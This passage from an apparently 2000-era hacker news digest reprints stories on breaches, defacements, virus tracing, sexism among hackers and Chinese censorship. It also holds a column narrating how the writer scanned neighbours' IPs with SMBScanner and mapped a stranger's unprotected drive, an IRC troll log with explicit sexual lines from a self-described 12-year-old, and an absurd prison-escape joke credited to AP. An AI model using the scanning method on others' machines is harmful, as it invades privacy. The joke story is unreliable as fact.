Justin Tanner had been spending his time in prison wisely. By incorporating secret yoga techniques and remaining on a diet of only his own urine, insects and St Johns Wort with ginseng snaps, he was able to lose weight and gain the dexterity necessary to hide his body in the cavity of his wooden leg.

"It appeared to be just laying there by itself, I assumed Mr Tanner was in the exercise yard," said a bewildered prison guard. The guard, 50 yr old Cliff Draper, had picked up the apparently mislaid prosthetic and moved it, unaware of the concealed Tanner, to an unsecured location. After waiting 4 hrs cramped inside the leg hollow of the limb he squeezed out just before clamp down and made good his escape in a laundry hamper.

AP

@HWA

259.0 [IND] Peeping Through Port 139
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 2 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_060500a_j.shtml

6/2/00

Peeping Through Port 139

I couldn't believe it. There, before me on my computer screen, was a directory filled with family photos, labeled by name. I could have looked at pictures of these folks if I'd cared to. It wasn't my family, though, and these photos weren't on my computer. I had no idea whose computer they were on, but I guessed it was someone in my apartment building, and that they hadn't a clue I was spying on them.

Many of us here in my building get Internet access through cable modems. Few know of the security risks. Now that high-speed access to the Internet can be had through cable and digital subscriber lines (DSL), security holes are easier to exploit. They're easy to fix too, but few are, probably because few people know about the breaches in the first place. Certainly, the cable guy who hooked me up never told me that Windows, in effect, offers an Internet party line to my hard drive.
I'm guessing that at least three of my neighbors weren't informed either.

How easy is it to tap into a neighbor's computer if it isn't secured properly? Insanely easy, I learned after a recent night of experimenting. It doesn't take any networking savvy -- just the right program and some anti-social attitude.

One such program is called SMBScanner. It took me about 10 minutes to find on the Internet. Like a police scanner monitoring many frequencies, this software rolls through Internet-protocol (IP) numbers (Internet addresses of nine digits separated by periods, the online equivalent to phone numbers), checking for open ports on computers.

Now, a cable company like the one I use usually reserves blocks of successive IP numbers for customer use. So I figured my neighbors would have numbers nearly identical to mine, probably varying only in the last two digits. SMBScanner paid a visit to each of these addresses, checking to see if port 139 -- the connection point computers often use to network with one another -- was open. Within minutes, it found three.

From there, it was just a matter of employing the operating system's user-friendly ability to "map" another computer's hard drive to its own file system. This was a snap, given that two of the three computers had no password protection whatsoever. One poor user actually had a printer online. I pondered printing him or her a page reading YOU'VE BEEN HACKED! But what good would such a missive be if I couldn't enjoy the other person's surprise upon receiving it? Anyway, it was probably best to remain in stealth mode for this fact-finding mission.

So I mapped someone else's C drive instead, giving me access to its contents. And that's when I found the directory named "Family Photos." That's also when I chickened out. I couldn't nerve myself up to actually look at any of the snapshots. I felt guilty enough already for having snooped this far. So I disconnected. My point was made.

I didn't actually want to peer into somebody else's computer; I just wanted to see if I could do it.

Anyone who has a high-speed Internet connection (and wants to avoid having done to them what I nearly did to my neighbors) should take the ShieldsUp security test offered by the Gibson Research Corp. (GRC, grc.com), run by computer guru Steve Gibson. It's where I learned about these vulnerabilities. GRC's Web site tests your computer to see what ports it can wiggle into. It's an eyeopener.

How does this happen? It's a weird amalgamation of factors, a snafu that only surfaces when home networking, dedicated Internet lines, and people's steadfast refusal to use passwords are combined. Start with someone tying two computers together. According to GRC, when "Microsoft's networking client is installed, a default setting which would have protected many millions of computers if it were normally set to 'off' is instead set to 'on.'" Upshot? A home network is left open to the entire Internet. What is odd about this is that it is totally unnecessary. This option was set to "on" only to save Microsoft in customer-service calls, the Gibson site contends.

Until recently, the pitfalls of home networking were limited, as most networked Netters went online with dial-up connections, which were assigned IPs more randomly. They remained online for limited periods of time and so were harder to pinpoint. But as more people set up networks and use connections that are always "on," it is starting to make for a lot of sitting ducks. And there are a lot of clandestine hunters out there. Here are computers that remain online for long stretches of time, with easily discoverable IP numbers. What better place than on somebody else's computer to spend some time nosing around, looking for free software or just some neighborly dish?

I asked a system administrator who used to work for one of Baltimore's Internet service providers how much port-scanning he used to see.

"The amount was staggering," he responded by e-mail -- about once a minute, some unknown computer cracker would test the lines, looking for an in. The friend's employer blocked that sort of traffic from reaching its customers, at least that from folks with other ISPs. It didn't stop this company's customers from snooping on each other, though, as I'd snooped on my neighbors.

GRC provides an easy explanation of how to secure port 139. All it involves is a few points and clicks. The biggest challenge is letting people know.

C Y B E R P U N K
By Joab Jackson
http://www.citypaper.com/2000-05-03/cyber.html
Just like reverse TV: joabj@charm.net.

@HWA

260.0 [IND] Hacker Hits Road Runner Server;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 2 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_060500b_j.shtml

6/2/00

Hacker Hits Road Runner Server; Subscribers Need New Passwords

Houston subscribers to Time Warner Communications' Road Runner cable-modem Internet service were told Thursday night to change their passwords after a hacker broke into an e-mail server. But a glitch in a computer prevented customers from making the change Thursday evening.

Spokeswoman Kimberly Maki said the hacker may have gotten access to a database of e-mail logons and passwords on Wednesday. Road Runner technicians noted suspicious activity on the network and disabled the hacker's cable modem about 30 minutes after the intrusion started, she said. The hacker tried to come back in via the Internet later and was stopped again.

Maki said technicians would complete a planned upgrade of the Road Runner system Thursday night and use the opportunity to increase security. Customers were e-mailed instructions for changing their passwords on Thursday. A technical support staffer said Thursday the computer used to update customer information was down and likely would be back up sometime today.

Maki said Road Runner managers believe they identified the hacker and notified law enforcement officials.
By DWIGHT SILVERMAN
Copyright 2000 Houston Chronicle
June 1, 2000, 7:57PM
http://www.chron.com/cs/CDA/story.hts/business/568293

@HWA

261.0 [IND] Swedish Hacker-Tracker Is FBI And Media Darling
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 12 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_061200a_j.shtml

6/12/00

Swedish Hacker-Tracker Is FBI And Media Darling
By Eva Sohlman

STOCKHOLM (Reuters) Saturday June 10 10:26 PM ET - The FBI, desperate to track down the source of the ``Love Bug'' computer virus last month, turned to a shy 19-year-old Swedish student.

Jonathan James came under the media spotlight after he helped the world's most famous crime-busting agency trace the origins of the virus that caused billions of dollars in damage to computers around the world. But right now he is more interested in getting through his school exams and enrolling in law school later this year.

In recent weeks more than 150 foreign journalists have called James or traveled to his home -- a country cottage a short distance outside the university town of Uppsala -- to get his story. James is unfazed by the media attention. He is concentrating on finishing his school exams this month and is setting up a joint venture for computer security solutions.

The journalists are not the only ones to court James. The U.S. Federal Bureau of Investigation (FBI) calls him several times a week to discuss security issues and ways of tracing computer hackers. The first time they contacted him, he said, was when he had tracked down the creator of the ``Melissa'' virus in 1999 -- something the FBI still have not acknowledged officially.

``Well, I suppose it's hard to admit someone else did their job,'' James told Reuters. He recalled how they seemed to expect him to be honored by their call and spoke to him condescendingly.

``But I called them by their first names and that cooled them down.''

James says he is not interested in hacking or computer games, and denied that he was working on a new virus. With the media frenzy surrounding ``Melissa'' still fresh in his mind, he told the FBI he would not help track the ``Love Bug'' when it emerged at the beginning of May.

``I had decided that this time they would have to do it on their own but then I had a few hours left over on the Sunday...,'' he said.

James decided to try to find out who was behind the virus when another Swede pointed the finger at a German student. Within hours he had gathered information on some well-known hackers' styles of programming and found one which had elements in common with the ``Love Bug.''

The next day, the Washington Post, drawing on U.S. officials, reported James' findings as the most crucial and later in the day a 24-year-old Philippine computer student who had submitted a thesis describing a program similar to the virus, was arrested. The FBI had come to the same conclusion, James says. The only difference was that it had taken them days.

U.S. security expert Richard M. Smith said many computer experts had taken part in the virus hunt but that James was the single most important player. ``Jonathan found extremely important clues and if he hadn't been around it would have taken some more days to find the guy,'' Smith said.

International Top-Hacker Career Not On The Agenda

But a career as a professional hacker, working for the world's most sophisticated intelligence services, does not appeal to James. ``I want to be my own boss and decide myself what I should or shouldn't do,'' he said. He will start law studies at university later this year.

``I've wanted to study law since I was nine -- even before I got into computers -- and I think it could be fruitful to combine it with computers.''

James says he is interested in security programming computers because it resembles the language studies that fascinate him. Studies in Greek, German, English and Latin help him to trace the origins of words -- something he says he enjoys while reading. The Swedish spy story writer Jan Guillou and American author John Grisham are his favorite writers.

In the little spare time he has James practices martial arts, listens to all kinds of music, especially American hip-hop, and hangs out with his half-English family who have helped him keep his feet firmly on the ground during the media circus.

He tells of the time a journalist from French television was standing outside his house at 9.30 in the morning and caught him in his underwear. ``I was only wearing boxer shorts and there she was. She never wanted to leave but just sat there on our sofa and left around one o'clock in the afternoon.''

Governments Lax On Security

James said he could not understand computer crime or why some people seemed to get a thrill from it. ``It's just vanity that seems to drive those hackers,'' he said. He criticized governments for being too lax with security, adding that he had found a big security hole in the homepage of Sweden's ruling Social Democrats but it took three weeks before it was sorted out.

He thinks worries about the security of on-line shopping are over-hyped because it is much harder to obtain credit card numbers without being traced than most people believe. On the other hand there is no such thing as a 100 percent safe Web site, he concluded.
@HWA

262.0 [IND] Hackers Force HK Government Website to Shut Down Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6/12/00

Hackers Force HK Government Website to Shut Down Again
8:49 Monday 12 June 2000
AFP

HACKERS launched a further attack on a Hong Kong government website yesterday, forcing officials to close the site down for the second time in less than 24 hours, a spokesman said.

The government decided to temporarily shut down the Interactive Government Services Directory website "to solve problems created by two defacement cases over the weekend", it said in a statement.

"We resumed service at 2 am today after a defacement yesterday, but the website was still subjected to further attacks," the government spokesman said yesterday.

Hackers attacked the site in the afternoon following an attack on Saturday which forced the site to shut down for more than 10 hours.

"The other government websites have not been affected," the spokesman said. "The outward symptoms of the two attacks are similar with the homepage being defaced and replaced by messages," he said.

The government shut down the affected homepage yesterday after the messages "Own3d by the Crows" and "hacked by O Analista" were found posted on the site. Analista means analyst in Spanish.

Police were investigating the case, the government statement said. The government successfully fended off two attempts to hack into its website last year.

http://www.it.fairfax.com.au/breaking/20000612/A61920-2000Jun12.html

@HWA

263.0 [IND] Dozens of Malaysian Political Web Sites Hacked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 12 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_061200c_j.shtml

Dozens of Malaysian political Web sites hacked
By The Associated Press
Special to CNET News.com
June 11, 2000, 8:45 a.m. PT

KUALA LUMPUR, Malaysia--Hackers have broken into dozens of Malaysian political Web sites, leaving government officials and opposition leaders fuming today over images of rotting skulls and obscene messages.

One vandal, calling himself "Xenophoria," attacked 21 pro-government Web sites, posting a list of demands for greater press freedom and an end to corruption. "Stop government intervention in media. Justice for all," the hacker wrote.

Cyberspace has been a fierce battleground for Malaysian politics in the past year, with more than 100 anonymously run Web sites fueling debate over the country's leadership and laws. Opposition leaders rely heavily on the Internet to drum up support, because they say the tightly controlled mainstream press is biased. The government, however, often plays down the Internet's potential impact on voters in Malaysia, where many of the country's 22 million people live in rural areas with limited Internet access.

Both sides have so far condemned the hacking, which apparently began Friday, and vow to expose the culprits. "We don't condone such foolish conduct," said Tian Chua, vice president of the opposition National Justice Party. "These are unreasonable acts of cowardice which benefit neither the government nor the opposition."

A popular opposition Web site called "Laman Reformasi," or "Reformation Site," was reported to have been attacked first. The vandal, who identified himself as "Junior Hacker," posted several obscene pictures on the Web site, in an apparent reference to jailed politician Anwar Ibrahim, who is on trial for sodomy. Opposition loyalists retaliated by penetrating their rivals' Web sites and branding supporters of the government as "fanatics."

Politics online surged shortly after Prime Minister Mahathir Mohamad sacked Anwar as his deputy in September 1998, calling him an immoral homosexual. Anwar was subsequently sentenced to six years in jail for corruption and faces another twenty years if convicted of sodomy.
He claims Mahathir orchestrated a conspiracy to oust him. Copyright © 2000 Associated Press. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed. @HWA 264.0 [IND] Youth Nabbed in Singapore for Hacking in Australia ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 12 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061200d_j.shtml 6/12/00 Youth Nabbed in Singapore for Hacking in Australia 9:08 Monday 12 June 2000 DPA AN INDONESIAN youth who hacked into the computer server of a Singapore research and development institute while studying in Australia was arrested on coming to the city-state to study, it was reported on Saturday. The 15 year-old boy, who was released on 10,000 Singapore dollars ($A11,834) bail, was nabbed at his relative's apartment and his new computer seized, The Straits Times said. Police said the student hacked into the server at the Data Storage Institute when he was in Australia during March and April. The boy learned from an Internet chatroom that the institute's network was vulnerable and could be hacked into easily, they said. He continued hacking into the system after arriving in Singapore to study English and mathematics and was tracked down by the police Computer Crime Branch. A specialist at the institute had found unauthorised computer programmes within the system and unauthorised user accounts in operations. Some of the connections were made through overseas computer systems. A spate of hacking incidents has prompted Singapore judges to slap jail sentences on youthful offenders instead of probation. Police said they were continuing their investigation into the latest case. 
http://www.it.fairfax.com.au/breaking/20000612/A61943-2000Jun12.html

@HWA 265.0 [IND] Facing a Man's World: Female Hackers Battle Sexism to Get Ahead
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 12 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_061200e_j.shtml

6/12/00

http://abcnews.go.com/sections/tech/DailyNews/hackerwomen000609.html

Facing a Man's World
Female Hackers Battle Sexism to Get Ahead

The experience of women at the entry levels of the hacking scene, mostly in online chat groups, is one of relentless sexual harassment. It is a hard battle for women to be respected in a culture dominated by teenage boys.

By Sascha Segan
June 9

For women hackers, there's a different kind of glass ceiling to break.

Hacking has traditionally been a man's world. But women are quietly breaking into the hacker subculture, a loose group of computer enthusiasts who meet in online chat rooms and at real-life conventions.

Not surprisingly, as in other male-dominated spheres, these women are often harassed and mocked by certain insiders, though here it is by teenage boys, who make up most of the entry levels of hackerdom.

The chat rooms where beginning hackers often learn technical tricks are stocked with "little hacking boys from hell; how awfully rude they are, and how intelligent they are," according to a hacker who goes by the handle Natasha Grigori and heads antichildporn.org, an organization of hackers who track down child pornographers on the Net.

R-E-S-P-E-C-T

But the few female hackers don't network with each other; in fact, some of their greatest trouble comes from other women, called "scene whores": hacker groupies who use sex to get ahead.

Fortunately, the few women who break through to the elite ranks of hacking find that at the top, what matters is your technical skills, not your gender.

"If you can match their [male hackers'] skill level and better it, they'll give you every ounce of respect. ... It's when a female comes in and tries to play on her being feminine, that doesn't get you anything," says Blueberry, a 32-year-old woman from Brisbane, Australia, who founded condemned.org, another anti-child porn organization.

ABCNEWS.com spoke to more than a dozen female hackers from the United States, Australia and New Zealand for this two-part series. Last week's piece looked at who the female hackers are; this week, we examine the challenges they face.

A note about names: Like most hackers, these women choose to go by online handles. Real names will be specifically marked as such.

Hackers vs. Scene Whores

Courtnee, a 20-year-old hacker from the Pacific Northwest, says the prevalence of hacker groupies makes it more difficult for true female hackers to get respect. (www.twistedlens.com)

There are plenty of women at hacker conventions; they're just not all hackers. Some are girlfriends, some wives. But the female hacker's nemesis is the scene whore. These latex-clad hacker groupies haunt conventions and offer teenage boys cybersex in chat rooms to boost their own self-esteem, female hackers say.

"The average woman, in today's society, could remain unnoticed," says Blaise, a 29-year-old woman from New Zealand. "Looking at an average woman in a computer society that consists of mainly antisocial men, she will be the center of attention. It's those girls that give every woman a reputation ... and that's what you have to prove yourself against before you gain any respect."

And the prevalence of scene whores has shattered any female solidarity that might exist among the hacker community, as groupies fight over the most highly skilled men and real female hackers fight the boys' assumption that all women in the scene are groupies.

"When I first started in the scene, this one person said, you know, you can be my cyberwhore and you'll be elite through association," says Blueberry, who says she rejected the advance.

Dark Tangent, head of Defcon and a prominent male hacker, remembers a scene whore having videotaped sex with a male hacker in an elevator at the convention's Las Vegas hotel. He warns of "evil groupies" who condition poorly adjusted male hackers to think of women as sex toys.

Natasha says she regularly has to throw women out of the IRC chat room that she hosts because they disrupt the tech talk by offering cybersex to her teenage charges.

"It's really bad as far as the women ripping each other to shreds. This whole cybersex thing really bothers me," Natasha says.

A_kitten, a 34-year-old woman from California whose Web site features sexy photos of herself, has been described as everything from a scene whore to a "Cult leader" by terrified male hackers unwilling to give names to a reporter for fear of her legion of groupie script kiddies, who used to crash sites on her command.

She doesn't deny using her femininity to get her way in a male-dominated society.

"People just assume that since I am a girl and I have that power that I must be abusing it," she says. "I think some guys are intimidated or offended by the natural power that women possess."

But St. Jude Milhon, a prominent hacker from Berkeley, Calif., doesn't see using feminine wiles as part of the spirit of hacking. "It wouldn't be sporting. Simply be present, honest, reasonably competent, female, and everyone's aghast."

Fighting to Be Heard

But it's a hard battle for women to be respected in a culture dominated by teenage boys. The experience of women at the entry levels of the hacking scene, mostly in online chat groups, is one of relentless sexual harassment.

British sociologist Paul Taylor, author of Hackers: Crime in the Digital Sublime, terms this the "Wild, Wired West," a rough-and-tumble social environment determined by the attitudes of insecure teenage boys trying to impress each other with typed testosterone.

"It's almost like some Lord of the Flies-type environment," he says, referring to William Golding's novel about a group of teenage boys who descend into feral savagery when cut off from civilization.

The anonymity of online interaction also fuels sexual harassment, making it more difficult to enforce social rules and freeing the most maladjusted young men to take out their sexual frustrations on people with feminine handles, Taylor says.

"The first time I posted, I posted with a woman's nickname. I was ripped to shreds: 'You're a woman, get off here, we're not going to help you,'" Natasha says.

When RosieX, founder of the Australian cyberfeminist magazine GeekGirl, got into the online bulletin board scene in 1990, she found women so intimidated by that attitude that they pretended to be male to avoid harassment.

"I was frustrated, because I wanted to learn skills and all the boys wanted to do was f---," she says.

Even a_kitten, who takes pride in her power over those boys, sneers at them. "For every 50 jerks on IRC, I stumble upon one nice guy that I can talk to," she says.

Non-Sexist Elite

But the sexual gantlet seems to fade with experience. Defcon's Dark Tangent says top-rank hackers generally stay away from the IRC channels, waiting to see whose thirst for knowledge is great enough to survive the savage atmosphere. To them, skill is all that matters, not the body it comes in.

"When you interact with people such as the L0pht, or the cDc or the most experienced members of the hacker culture, gender is a non-issue. It's what you know that matters, and less who you are," says Javaman, a Philadelphia-area hacker. "There is sexism at the lowest levels, but among the more skilled people, the more able people, it really is a non-issue."

And at conventions, hackers seem to love nothing more than a woman who can fix a network breakdown. Though they're tormented online, for some reason the rare women in hacking are treasured in person, female hackers say.
"Girls are victimized only in the bodiless state; in the flesh, they're objects of wonder and fascination," says Milhon.

@HWA 266.0 [IND] Social study: staunch religious hackers?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(url pulled)

Interesting discussion sent in detailing something about religion and how it affects the modern hacker culture, or is it just some guy taking the piss out of some _____r h___ r_____s? - Ed

Submitted by: Mehmet Ali Agca and the Christpunchers

*** Starting logfile IrcLog
*** IRC log started Mon Jul 10 13:27:27 2000
*** Value of LOG set to ON
cool noticed that a couple of new ones have been added
yes servers up to 124 now!
IOM has set up quite a few specialist channels on ccnet
i've been asking jesus what to do
including #cult_outreach, #abuse_outreach, #youth_outreach, #porn_outreach etc
I just read the doctrinal statement on the web page. I was impressed.
but i just can't find the answers can anyone help?
What is your question joshua?
what about joshua?
ok r u from a gay background joshua?
i know the bible teaches me not to be gay but i'm lusting over this guy that is also gay
i know lust is a sin
would u like to read an email i wrote about ministering to gays?
but i can't control my urges
*** SignOff wreath: #Gay_Outreach (Connection reset by peer)
what should i do?
It only feels like you can not control your urges joshua, God says that you CAN control them with His help. One aspect of the fruit of the Spirit is *self-control*
well for a start joshua u have to realise you cannot do this in your own strength
we are powerless to fight sin in our own strength
the bible calls that striving
amen
but how do i do that?
and we set ourselves up for a fall when we do
we must rely on Gods ability to deliver us from temptation
and to set us free from the works of the flesh
temptation is strong, though
yes it is.....
how old r u joshua?
12
hmm really?
*** Adri [CCNet6.0@edtn013749.hs.telusplanet.net] has joined #Gay_Outreach
yes
josh, have you given in to your lusts and had sex with anyone?
how olds this other boy Joshua?
Denis: no
Good!
Eagle^: i don't know
ok are u a christian josh?
ShermAway: hardcore 100% :)))
good
*** Guest42617 [JAVGUEST@98AF8102.ipt.aol.com] has joined #Gay_Outreach
do u believe God can help u?
*** Guest42617 is now known as Tzadok
Hi Sherm
josh, work like crazy NOT to do it brother. Right now you have no experiential history that can be used to draw you further into sin. Make a real strong commitment not to give into your desires.
ShermAway: yes
*** Tzadok was kicked off #gay_outreach by ShermAway (ShermAway)
*** mode/#Gay_Outreach [+b *!*@98AF8102.ipt.aol.com] by ShermAway
autoban on him folks hes a troublemaker
josh - do u read your bible?
Growing up in Jesus is all about saying no to the evil desires that we face. That is part of what it means to become a man.
ShermAway: not as much as i should
ok do u where 1 corinthians is?
i love god and i want him to be my best friend. he is my home boy.
ShermAway: yes
ok look up this verse 1 cor 10:13
No temptation has overtaken you but such as is common to man; and God is faithful, who will not allow you to be tempted beyond what you are able, but with the temptation will provide the way of escape also, that you may be able to endure it.
then believe it!!!
God will provide an escape route out of all temptation
our part is to look for it and then take it! :)
sounds like a plan
no to give into the sin
yep it works well if you trust God to deliver you from temptation
He always keeps His promises
It is such a wonderful thing to see how weak we are josh, and then to see how God's power can give us the strength to be pure and holy. He is always there with His strength and with a way of escape.
i just want to shove my hard pounding love muscle into his greasy asshole as we are embraced in hot gay sex. i want to feel his manliness inside of me.
i want to grab that mouth of his and take a big fat shit in it
oh dear
>>> You have been kicked off #gay_outreach by ShermAway (ShermAway)
*** [#gay_outreach] Banned from channel
*** IRC log ended Mon Jul 10 13:40:02 2000

@HWA 267.0 [IND] Ex-KGB Major Leads US War Against Hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 12 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_061200f_j.shtml

6/12/00

Ex-KGB Major Leads US War Against Hackers
Date: 10/06/2000
By BEN FENTON in Washington

A former senior KGB officer who defected to America is patenting a new device to thwart hackers and could be the saviour of the US computer industry.

Victor Sheymov is also poised to become the next "dot com" multi-millionaire after he left the service of American intelligence to found a "cybersecurity" company outside Washington. The ex-KGB major has even persuaded James Woolsey, a former director of the CIA, to join his board of directors.

Mr Sheymov was smuggled out of Moscow with his wife and daughter by the CIA. Soon he was working for the highly secretive National Security Agency (NSA) trying to find ways of breaking into the KGB communications systems that he had designed.

He turned to the private sector after falling out with the CIA over the dlrs 1 million (pounds 670,000) he says he was promised as part of his defection package. "The CIA cheated me in a major way," he told the New York Times.

Although he defected more than 20 years ago, he only settled his differences with the American government last year. By then he had started work on his "algorithm", a set of programming instructions for a computer, which he believes can make any machine impregnable to hackers.

Hacking has become a threat to America's military and corporate infrastructure. Both the State Department and the FBI have been embarrassed by breaches of computer security. The agency employs young hackers to test its own security and to break into the systems of foreign governments, terrorist organisations and drug syndicates.

After perfecting his algorithm, Mr Sheymov used his former NSA colleagues to test it. "We tried and we couldn't get in," said one expert hacker with 18 years of service at the agency.

The Daily Telegraph
http://www.smh.com.au:80/news/0006/10/text/pageone3.html

This material is subject to copyright and any unauthorised use, copying or mirroring is prohibited.

@HWA 268.0 [IND] Flagship Hong Kong Govt Web Site Defaced, Twice
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 13 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_061300a_j.shtml

6/13/00

Flagship Hong Kong Govt Web Site Defaced, Twice
By Adam Creed, Newsbytes
HONG KONG, CHINA, 13 Jun 2000, 12:02 AM CST

A flagship Hong Kong Government Web site was defaced twice over the weekend, resulting in its eventual closure and the start of criminal investigations by local police authorities.

The Interactive Government Services Directory (IGSD) was recently launched in Hong Kong - promoted as an online gateway to government services information for Internet users.

On June 10, a spokesman for Hong Kong's Information Technology Services Department confirmed the directory Web site front page had been defaced during the afternoon.

"Two messages were found attached on the home page of the IGSD shortly after 3.30 pm," said the spokesman. "To facilitate investigations into the incident, we closed down the system at about 3.45 pm."

It is unclear what the nature of the security breach was and if any changes were made to secure access to the site ... because at around the same time the following day the Web site was again defaced.

The service was then shut down and remains offline as of Tuesday Hong Kong time. The spokesman said the site would remain offline in order to "solve the problems created by two defacement cases over the weekend."

According to the Information Technology Services Department, the IGSD Web site is hosted on a stand-alone server separate from Hong Kong Government internal computer networks.

The Hong Kong Police are investigating the matter.

The IGSD Web site can be found at http://www.igsd.gov.hk .

@HWA 269.0 [IND] Modest Teenager Is FBI's Secret Weapon In War Against Cyber Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 13 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_061300b_j.shtml

6/13/00

Modest Teenager Is FBI's Secret Weapon In War Against Cyber Crime

The Federal Bureau of Investigation consults a 19-year-old student from Sweden several times a week to discuss new strategies for their fight against computer hackers, it has been revealed.

News of Jonathon James' prowess as a cyber sleuth followed his breakthrough in tracking down the culprit behind last year's Melissa virus. And after news of the Love Bug broke in May, it was James who the FBI turned to before its origins could be traced to the Philippines.

So far more than 150 foreign journalists have called or visited him at his home in Uppsala, a town just a few miles north of Stockholm.

But despite mounting international fame, he is keen to play down his role for the FBI, preferring to concentrate on his ongoing studies and plans for a future business enterprise.

However, he is prepared to offer some commentary on the current state of global e-commerce and internet communications. While governments are generally still rather complacent about online security, fears about online shopping are too often exaggerated, he told Reuters reporters.

Last updated: 12:18 Monday 12th June 2000.
http://www.ananova.com/news/story/internet_us-internet-crime_142970.html

@HWA 270.0 [IND] Daemons on the Net: Stereotyping the hacker **
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 13 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_061300c_j.shtml

6/13/00

Daemons on the Net
Stereotyping the hacker

Summary

SunWorld columnist Carole Fennelly defends the term hacker and offers a rebuttal to "Invisible Enemies," a recent article in Vanity Fair which she calls "a sensationalist, good-versus-evil script filled with the sort of cheap stereotyping found in TV movies." (700 words)

--------------------------------------------------------------------------------

http://www.idg.net/ic_188368_1794_9-10000.html

UNIX SECURITY

--------------------------------------------------------------------------------

By Carole Fennelly

I was at a conference recently talking with the CEO of a computer security company who emphatically stated, "We don't hire hackers."

Curious, I asked if she meant that her company doesn't hire people with criminal records. She clarified: "We don't hire people who attend DefCon, have online handles, or who participate in hacker forums. Or who hang around with hackers."

In other words, her company doesn't hire people who don't conform to the mainstream. I wonder how she and her HR department determine which job candidates are associating with undesirables?

Is that perhaps why the term hacker is so controversial? Because hackers don't conform? The US Founding Fathers didn't conform, either.

Down through the ages, any group that didn't conform to mainstream society was subject to various forms of persecution: the Inquisition, the Salem witch trials and, more recently, the McCarthy hearings. It's rather ironic that the United States, which was founded on the principles of accepting diversity, supported McCarthy's modern version of a witch hunt.

It's comforting to look back on those days of investigating subversives as a black moment in the history of democracy, from which we have thankfully learned a lesson. But have we?

The June issue of Vanity Fair has an article by Bryan Burrough titled "Invisible Enemies." According to the editor, this is supposed to be an article detailing "high-tech procedural detective work." In reality, it is nothing more than a sensationalist, good-versus-evil script filled with the sort of cheap stereotyping found in TV movies. Perhaps that was what Burrough was looking for in the first place. Who cares about the facts? After all, this is Vanity Fair -- entertainment, not real news.

I care. I care because I work in an industry where I have to deal with the consequences of this stereotyping.

Burrough picked up on the squeaky-clean image of J.P. Vranesevich, founder of AntiOnline, and cast him as the Hero of this little melodrama. It doesn't matter that Vranesevich is nothing more than a paid snitch with limited technical ability; he looks wholesome. He fits the part of Upstanding American Youth.

Burrough chose Vranesevich's harshest critic, Attrition.org founder Brian Martin, to play the Villain. After all, Brian looks like he just stepped off the set of The Crow and hangs around with subversives. It doesn't matter that he is a six-year veteran of the professional security field and has the respect of law enforcement and journalists. He looks dangerous. He fits the part of the Evil Hax0r.

I won't get into the specifics of everything that's wrong with this 10,000-word article (though the fact that it is 10,000 words too long is its first problem). Brian posted a rebuttal on the Attrition site that addresses some of the issues.

"But", a techie might argue, "what do I care? I just want to know about the latest product releases and bugs. I don't care about that other stuff."

Well, upper management does, and, like it or not, managers set the policies that govern how the techies play with the bits and bytes. Do you really want your managers to decide what nightclubs are acceptable for you and your fellow employees, and dictate the sort of person with whom you may associate?

"Oh, that'll never happen," you might say. Yeah. And we didn't think McCarthyism could happen here either.

McCarthyism isn't dead -- it's just found a new target.

About the author

Carole Fennelly is a partner in Wizard's Keys Corporation, a company specializing in computer security consulting. She has been a Unix system administrator for almost 20 years on various platforms, and provides security consultation to several financial institutions in the New York City area.

@HWA 271.0 [IND] China: Defiant Cyber Surfers Play Cat-and-Mouse Game
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 13/(8th) 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_061300d_j.shtml

6/13/00

http://technology.scmp.com/internet/DAILY/20000608084435429.asp

Published on Thursday, June 8, 2000
INTERNET

Defiant cyber surfers play cat-and-mouse game
JOSEPHINE MA

Defiant cyber surfers in mainland China can run Web sites and circumvent police control by using overseas service providers.

The Web site run by Huang Qi - 6-4tianwang.com - operates via a US-based Internet service provider. This means its content can be updated either on the mainland or in the United States and mainland surfers can easily slip through filters set by mainland cyber police.

The site was still accessible on Wednesday and a statement about Mr Huang's arrest - apparently by its operators in the US - was posted on its homepage on Wednesday night. The chat room also remained open.
When the authorities try to block sites like 6-4tianwang.com, surfers can still manage to access them by using overseas or other methods. The Web site was launched in June last year as the first in China dedicated to helping people find relatives abducted by traffickers. The case of 6-4tianwang.com highlights the difficulties faced by mainland authorities in policing the Internet. Cyber police have issued numerous regulations to tighten their grip on the Internet. And the State Council recently set up a special division under its Information Office to monitor news on the Web. But there are plenty of indirect routes to post messages on the net and there are always ways to access them. Examples include discussions about the 1989 Tiananmen Square crackdown - a subject considered taboo by the authorities. No matter how fast Web masters move to delete messages posted on their chat rooms, surfers can always shift to other chat rooms to continue their discussions. It was not the first time Mr Huang had been in trouble with the authorities. The Web site was shut down by police in March over reports concerning the human rights of Chinese labourers working overseas. It was reopened in April apparently with the help of a US-based Chinese group. Undeterred, Mr Huang went further late last month and began to post news related to the 1989 